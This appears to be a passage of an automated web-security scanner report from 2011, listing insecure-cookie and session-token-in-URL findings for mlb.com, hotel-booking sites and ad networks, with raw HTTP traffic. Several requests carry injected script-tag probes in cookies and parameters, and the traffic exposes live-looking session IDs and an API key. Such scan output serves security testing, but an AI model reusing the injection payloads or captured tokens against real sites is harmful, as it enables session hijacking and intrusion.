User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Accept-Language: en-us
Referer: https://secure.mlb.com/resetPassword.do
Accept: */*
Host: secure.mlb.com
Cookie: s_cc=true; SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; stUtil_cookie=1%7C%7C9620647761317598889493; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:48:42 GMT
Expires: Mon, 03 Oct 2011 01:48:42 GMT
Edge-control: max-age=7200
Content-type: text/javascript;charset=ISO-8859-1
Content-length: 811
Set-cookie: SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; Domain=.mlb.com; Path=/


(function (window, $, bam) {

bam.env = bam.env || {};
bam.env.host = bam.env.host || {};

$.extend(bam.env.host, {

/**
* Returns base url for the CDN server

...[SNIP]...
9.6. https://secure.mlb.com/style/bam.css.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.mlb.com
Path:   /style/bam.css.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/bam.css.jsp?c_id=%0Adocument.title=1317599335378049; HTTP/1.1
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Content-length: 0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: secure.mlb.com
Cookie: s_cc=true; SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; stUtil_cookie=1%7C%7C9620647761317598889493; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:48:58 GMT
Expires: Mon, 03 Oct 2011 01:48:58 GMT
Edge-control: max-age=7200
Content-type: text/css;charset=ISO-8859-1
Set-cookie: SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; Domain=.mlb.com; Path=/
Content-Length: 9935


/* buttons */
/* global */
.bam-button {
font-family:"Helvetica", "Helvetica Neue", arial, sans-serif;
font-size:13px;
font-weight:bold;
text-decoration:none;
-moz-border-r
...[SNIP]...
9.7. https://secure.mlb.com/style/nav_2011.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.mlb.com
Path:   /style/nav_2011.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/nav_2011.jsp?c_id=%0Adocument.title=1317599336102051;&section=schedule HTTP/1.1
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Content-length: 0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: secure.mlb.com
Cookie: s_cc=true; stUtil_cookie=1%7C%7C9620647761317598889493; s_sq=%5B%5BB%5D%5D; SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:48:59 GMT
Expires: Mon, 03 Oct 2011 01:48:59 GMT
Edge-control: max-age=7200
Content-type: text/css;charset=ISO-8859-1
Set-cookie: SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; Domain=.mlb.com; Path=/
Content-Length: 16918


/* global overides */
#masthead body, #masthead div, #masthead dl, #masthead dt, #masthead dd, #masthead ul, #masthead ol, #masthead
...[SNIP]...
9.8. https://www.hotelplanner.com/Accept/Reserve.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:30:37 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58824

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
10. Session token in URL  previous  next
There are 31 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

10.1. http://a.intentmedia.net/adServer/impressions  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://a.intentmedia.net
Path:   /adServer/impressions

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /adServer/impressions?publisher_session_id=74C1C04EA1B1607D7CD2E1313B9B2779.p0617&cache_buster=1317600538540&product_category=hotels&site=TRAVELOCITY&time_zone_offset=300&submarket_id=MA134-0100&rooms=1&travelers=1&ad_unit_id=5&hotel_property_ids=4810_114273_46356_10677_601_41209_48167_28920_4643_25625_12989_1013_13360_64654_44777_9773_11430_10448_46065_32162_20077_1228_12056_34410_9074_202264_620_914_7745_27993_79419_50883_102143_12018_9817_2841_13114_2004_70926_1322_58534_774_12062_48559_26931_2738_15077_44999_52173_3_1747_20114_26186_65482_52374_22259_56985_19411_22479_32159_85128_16231_2844_18685_64276_57481_2837_1213_28041_11122_34000_35409_75432_80723_34758_24713_35992_34361_49791_54902_31216_7256_9239_50684_28588_16565_25026_33473_16477_35131_35054_24709_23560_22574_26118_138019_44277_4680_309_45625_39186_30198_44375_85127_63829_7921_31749_8178_42595_20007_119214_119432_119478_40415_103982_10487_10678_14412_21745_23568_25299_26117_30034_35838_41236_4470_49886_56521_59519_62421_64032_8867_10158_10348_13_25492_27425_54939_6073_18969_119779_119627_44593_62214_8046_33150_111060_64750_144426_138764_139993_121079_123761_124226_141217_45783_60995_80644 HTTP/1.1
Host: a.intentmedia.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Date: Mon, 03 Oct 2011 00:09:04 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI COM NAV INT"
Server: Jetty(6.1.17)
Set-Cookie: intentmedia_user_id=27f4839b-213a-4016-9212-fcfa87390629;Path=/;Expires=Wed, 02-Oct-13 00:09:04 GMT
Via: 1.1 a.intentmedia.net
Content-Length: 259
Connection: keep-alive

try{if (IntentMedia) {IntentMedia.PUBLISHER_REPORTS=false;IntentMedia.MONTHLY_ASAP_BUDGETS=false;IntentMedia.SUPPRESS_CHEAPTICKETS_GLOBAL=true;IntentMedia.SSN_ORBITZ_GLOBAL_SHOW_REVIEWS_TEST=false;Int
...[SNIP]...
10.2. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /bh/set.aspx?action=clr&advid=3420&token=RORO1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://rs.gwallet.com/r1/pixel/x1743
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WCR=132981_3_3Ilow^132982_4_3Iloz; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2%0A3115%3B10%2F30%2F2011%3BGNCT1; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"; cw=cw; FC1-WC=59764_1_3KjzP; CDSActionTracking6=5ZvoQhA3FQCr|PpAVCxNh2PJr|538936|3448|7061|59764|134043|106934|3|345|25|premierleague.com|2|8|1|0|2|1|2|EMON2.EHEX1.SMTC1.FACO1.BMBN1.MIWO2.GNCT1|1|1|-HAZoarNoKZDius-txPklIg7Z5oU_7wk6upA9MEPZ1w^|I|3JX6h|3UPoJ; vf=1

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: cw-app607
Set-Cookie: V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Wed, 26-Sep-2012 23:49:59 GMT; Path=/
Set-Cookie: cwbh1=357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2%0A3115%3B10%2F30%2F2011%3BGNCT1; Domain=.contextweb.com; Expires=Mon, 01-Oct-2012 23:49:59 GMT; Path=/
Content-Type: image/gif
Date: Sun, 02 Oct 2011 23:49:59 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;
10.3. http://cert.travelocity.com/___waseq.img  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://cert.travelocity.com
Path:   /___waseq.img

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /___waseq.img?Log=1&tntPage=http%3A//www.igougo.com/traveldeals/ratefinder.aspx%3FTypeID%3D1%26SourceID%3DTVLY-dRF-Popunder%26adlt%3D1%26end%3DBoston%26rm%3D1%26dest%3DBoston%2C%2520undefined%2520undefined%26strtDate%3D10/04/2011%26endDate%3D10/07/2011&tntTitle=Compare%20Hotel%20Rates%20-%20IgoUgo&tntReferrer=http%3A//www.travelocity.com/popWindow2%3FtheDomain%3Dwww.travelocity.com%26selectedForm%3Dcb-form-ho%26formPrefix%3DHO%26fromDate%3Ddd%26fromMonth%3Dmm%26fromYear%3Dyyyy%26toDate%3Ddd%26toMonth%3Dmm%26toYear%3Dyyyy%26theAdtoShow%3Dad2%26dest%3DBOS%26triptype%3D%26noOfRooms%3D1%26noOfAdults%3D1%26service%3DTRAVELOCITY%26oneway%3D&tntCampaignID=24175&tntCampaignName=Host%20Group%20Monitoring%20Campaign%20PROD%20%28Copy%29&tntRecipeID=2&tntRecipeName=Prod&tntTrafficType=0&tntOfferID=19910&tntMbox=RateFinderMboxHotels&tntPCID=1317601622475-177474.19&tntSessionID=1317601622475-177474&tntFirstSession=true&tntPageID=1317601622475-177474&tntTime=1317601629072 HTTP/1.1
Host: cert.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=session#1317600481056-80236#1317602632|PC#1317600481056-80236.19#1318810372|check#true#1317600832; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.3.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 403 Forbidden
Date: Sun, 02 Oct 2011 22:54:05 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 333
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /___waseq.img
on this server.</p>
<
...[SNIP]...
10.4. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /pixel?nid=chango&partnerId=&referrerURL=&token=b6ae888c-d95b-11e0-b096-0025900e0834 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://as.chango.com/links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://gcm.chango.com/collector/relator?id=E1&partnerId=&referrerURL=&token=b6ae888c-d95b-11e0-b096-0025900e0834
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:58:03 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 321
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://gcm.chango.com/collector/relator?id=E1&amp;partnerId=&amp;referrerURL=&amp;token=b6ae888c-d95b-11e0-b096-0025900e0834">here</A>
...[SNIP]...
10.5. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pixel?nid=chango&partnerId=&referrerURL=&token=b6ae888c-d95b-11e0-b096-0025900e0834 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://as.chango.com/links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://gcm.chango.com/collector/relator?id=E1&partnerId=&referrerURL=&token=b6ae888c-d95b-11e0-b096-0025900e0834
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:58:03 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 321
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://gcm.chango.com/collector/
...[SNIP]...
10.6. http://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://dev.virtualearth.net
Path:   /webservices/v1/LoggingService/LoggingService.svc/Log

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /webservices/v1/LoggingService/LoggingService.svc/Log?entry=0&fmt=1&type=3&group=MapControl&name=AJAX&version=6.3.20091207154938.04&session=1317586157554&mkt=en-us&auth=Ahn5L376ymB7iE0SUTiv0-mqke-onEds0hDyR5WF9uaGYphF-L3tsU6i7xcT-B5H&&jsonp=LogCredCB1317586664458& HTTP/1.1
Host: dev.virtualearth.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-BM-Srv: BL2M002303
X-MS-BM-WS-INFO: 0
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 01:02:30 GMT
Content-Length: 155

LogCredCB1317586664458({"sessionId" : "AuiPlePwo_oflytMscNY_RXyW2yQrF3qktQ3C7iY5lDdworXCyVwDP_XB0UJfFTV", "authenticationResultCode" : "ValidCredentials"})
10.7. http://gcm.chango.com/collector/relator  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://gcm.chango.com
Path:   /collector/relator

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /collector/relator?id=E1&partnerId=&referrerURL=&token=b6ae888c-d95b-11e0-b096-0025900e0834 HTTP/1.1
Host: gcm.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://as.chango.com/links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _i_rc=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad

Response

HTTP/1.1 200 OK
Content-Length: 35
Server: Chango RTB Server
Etag: "0f4e929dd5bb2564f7ab9c76338e04e292a42ace"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: image/gif
Connection: close

GIF89a.............,...........D..;
10.8. https://go.americanexpress-travel.com/hotel/HotelCobrand.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://go.americanexpress-travel.com
Path:   /hotel/HotelCobrand.do

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hotel/HotelCobrand.do;jsessionid=959CC77E68C7D0C1E45369CF857BC3F1.p0716?Service=AMEX&leavingDate=10/04/11&returningDate=10/07/11&searchMode=city&city=Boston,%20United%20States&cityCountryCode=&hotelName=&adults=1&?Service=AMEX&WA1=03010&WA2=%EF%BF%BDid&WA4=%EF%BF%BDid&cmpid=af-ctn-af000063&widgetid=ratefind-hot HTTP/1.1
Host: go.americanexpress-travel.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=amex&grp=21&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B206380952%3B28845483%3Bq%3Fhttp%3A%2F%2Fgo.americanexpress-travel.com%2Fhotel%2FHotelCobrand.do%3FService%3DAMEX%26leavingDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26returningDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26searchMode%3Dcity%26city%3D%24%7Bcity%7D%2C%2520%24%7Bcountryn%7D%26cityCountryCode%3D%26hotelName%3D%26adults%3D%24%7Badults%7D%26%3FService%3DAMEX%26WA1%3D03010%26WA2%3D%25eaid%26WA4%3D%25ecid%26cmpid%3Daf-ctn-af000063%26widgetid%3Dratefind-hot&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=141&pos=2&aii=2943600b-8719-4374-99f1-66c3d37bf8d3&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tyrg1st=5CE502CBA48A0513; JSID=959CC77E68C7D0C1E45369CF857BC3F1.p0716; TUID=987675b9-11f8-46ee-8be4-90a9f5cad5fa; JSESSIONID=959CC77E68C7D0C1E45369CF857BC3F1.p0716; Service=AMEX

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:41 GMT
Server: Apache
Set-Cookie: JSESSIONID=F117AC921CCE045ED73E1F0312D428B7.p0716; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7238

<!-- PAGE: TimeKeeper -->
<link rel="icon" href="https://axptravel.americanexpress.com/ctnwt/favicon.ico"/>
